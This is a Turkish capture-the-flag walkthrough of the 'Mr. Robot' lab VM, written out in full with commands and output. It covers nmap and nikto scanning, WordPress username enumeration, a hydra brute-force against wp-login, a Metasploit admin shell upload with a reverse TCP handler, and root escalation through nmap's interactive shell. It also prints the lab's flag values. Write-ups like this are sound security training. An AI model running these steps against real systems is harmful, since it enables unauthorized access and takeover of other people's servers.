mr robot.

oncelikle

#sudo netdiscover

diyerek makine ipsini buluyoruz yazinin devaminda 192.168.1.40 diye geciyor olacak direk nmap taramasi yapiyorum

#nmap -sS -sV -O -v 192.168.1.40 -p-
Nmap scan report for linux (192.168.1.40)
Host is up (0.00036s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 08:00:27:5C:C4:A8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8

madem web sunucusu hem bi browsera bakayim hem de bi yandan niktoya vereyim bir sey cikacak mi

mr robot site

site zaten mrrobotun web sitesi zaten burda direk bir sey yok (gosterilmeyen bir kac fonksiyon var kodlari kurcalayip bulabilirsiniz)

# nikto -h
...
+ Server: Apache
...
+ OSVDB-3092: /admin/: This might be interesting...
...
+ /readme.html: This WordPress file reveals the installed version.
...
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
...

nikto ciktisinda dikkatimi cekenler basta /robots.txt ve /admin/ yollari oldu ama tarama ilerledikce wordpress yuklu oldugu ortaya cikti robots.txt olayli cikti. fsocity.dic ve key-1-of-3.txt isimli 2 dosya var key-1-of-3.txt bizim 3 anahtarimizdan biri yolun 3te birini simdiden tamamladik demektir. fsocity.dic ise bi wordlist

# wc -l fsocity.dic

komutuyla satir sayisina baktigimda gordum ki 858160 satir var boyle is olmaz tekrarlayan satir varsa diye

# sort -u fsocity.dic > fsociety.dic

komutunu uyguluyorum (-u == unique). dosya 11451 satira indi.

niktodan ulastigim wp admin sayfasindan hydra ile brute yapmadan once olabilecek kullanici adlarini kendim denemek istiyorum cunku wordpress dogru kullanici adina farkli hata veriyor. mrrobot fsociety gibi hikayeye dayali kullanici adlari denerken elliot kullanici adina farkli hata veriyor. kullanici adini ogrenmis oldum

geriye kalan hydra ile elliot kullanici adina buldugumuz wordlisti kullanarak brute atmak. kullanici adlarini denerken de gonderilen istegin hangi bicimde gonderildigine burpsuite kullanarak baktim

# hydra -vV -l elliot -P fsociety.dic -vV 192.168.1.40 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect'

bir nevi regex kullaniyoruz hydrada hydra ciktisina gore parola “ER28-0652” parolayi aldiktan sonra once postlarda commentlerde gezindim bir sey cikmayinca elim direk metasploite kaydi. wp_admin_shell_upload modulunu kullaniyorum zaten elimde kullanici adi ve parola var.

(sonradan ogrendim ki /license.txt altinda guzel bir surpriz varmis)

$ msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf exploit(wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf exploit(wp_admin_shell_upload) > set RHOST 192.168.1.40
RHOST => 192.168.2.4
msf exploit(wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.34:4444
...
[!] This exploit may require manual cleanup of 'sagFKWvrxm.php' on the target

meterpreter >
#meterpretere dustu. bi de tty shelle dusurelim
meterpreter > shell
Process 2192 created.
Channel 1 created.
/bin/sh -i
/bin/sh: 0: can't access tty; job control turned off #tty dusmedi
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$

dosyalari biraz karistirdiktan sonra robot isimli bir kullanici dizinini farkettim

$ ls -larh /home/robot
total 16K
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .

ikinci anahtari da bulduk fakat okuma yetkisi sadece sahibinde password.raw-md5 dosyasindaki md5 sifreyi decode edince “abcdefghijklmnopqrstuvwxyz” cikti. bunun robot kullanicisinin parolasi oldugunu dusunerek robot kullanicisina geciyorum.

su robot
Password: abcdefghijklmnopqrstuvwxyz
<ps/wordpress/htdocs/wp-content/plugins/sagFKWvrxm$ cd
cd
[email protected]:~$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

geriye kaldi root olmak. makine icerisinde gezerken nmapin yuksek yetkide oldugunu gordum

bu da aklima nmap –interactive komutunu getirdi bu sayede nmapin root haklarini kullanabilmesinden biz de yararlanabiliyoruz

[email protected]:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> ! sh
! sh
# whoami
whoami
root
# cd /root
cd /root
# ls -larh
ls -larh
total 32K
-rw-------  1 root root 1.0K Sep 16  2015 .rnd
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
drwx------  2 root root 4.0K Nov 13  2015 .cache
-rw-r--r--  1 root root 3.2K Sep 16  2015 .bashrc
-rw-------  1 root root 4.0K Nov 14  2015 .bash_history
drwxr-xr-x 22 root root 4.0K Sep 16  2015 ..
drwx------  3 root root 4.0K Nov 13  2015 .
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

bb